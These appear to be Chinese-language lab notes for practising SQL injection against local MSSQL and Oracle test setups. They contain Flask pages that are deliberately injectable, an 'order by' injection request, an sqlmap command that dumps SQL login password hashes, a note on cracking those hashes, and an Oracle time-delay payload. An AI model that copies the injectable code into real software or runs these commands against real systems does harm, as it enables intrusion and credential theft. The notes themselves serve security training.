链接: https://github.com/dhgdhg/DVWA-Note

  • windows docker 安装mssql, 搭建测试环境
    • https://www.cnblogs.com/edhg/p/11530901.html
    • 编写mssql测试网页
        import pymssql
        from flask import Flask, request
        app = Flask(__name__)
        @app.route('/')
        def index():
            conn = pymssql.connect(host='127.0.0.1', user='sa', password='Pass@Word1', database='test')
            cursor = conn.cursor()
            my_id = request.args.get('id', '')
            my_sql = "select * from test_t where id=" + my_id + " and name='name1'"
            result_txt = my_sql + '<br><br><br>'
            try:
                cursor.execute(my_sql)
                row = cursor.fetchone()
                result_txt += "ID: {}<br>Name: {}".format(row[0], row[1])
            except Exception as e:
                result_txt += str(e)
            finally:
                cursor.close()
                conn.close()
            return result_txt
        if __name__ == '__main__':
            app.run()
    • 创建测试表test_t, 并添加数据
    • sqlmap下载用户名密码表
      • burpsuit抓包 并保存为rr.txt
        • 例:
            GET /?id=§1%20order%20by%203--+§ HTTP/1.1
            Host: 127.0.0.1:5000
            Accept: */*
            Accept-Language: en
            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
            Connection: close
      • 执行sqlmap下载用户名密码数据
        • sqlmap -r rr.txt --sql-query="select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins"
      • 使用johnny和字典对数据进行破解
  • windows docker 安装oracle, 搭建测试环境
    • https://www.cnblogs.com/edhg/p/11531475.html
    • 编写oracle测试网页
        import cx_Oracle
        from flask import Flask, request
        app = Flask(__name__)
        @app.route('/')
        def index():
            my_id = request.args.get('id', '')
            # 7369
            my_sql = "SELECT * FROM SCOTT.EMP WHERE EMPNO=" + my_id + " and ENAME='SMITH'"
            result_txt = my_sql + '<br><br><br>'
            try:
                dsn = cx_Oracle.makedsn(host='127.0.0.1', port=1521, sid='helowin')
                conn = cx_Oracle.connect(user='system', password='passwd', dsn=dsn)
                cursor = conn.cursor()
                cursor.execute(my_sql)
                row = cursor.fetchone()
                result_txt += "ID: {}<br>Name: {}".format(row[0], row[1])
            except Exception as e:
                result_txt += str(e)
            finally:
                cursor.close()
                conn.close()
            return result_txt
        if __name__ == '__main__':
            app.run()
    • and 1=(DBMS_PIPE.RECEIVE_MESSAGE(1, 10))
      • 延时10秒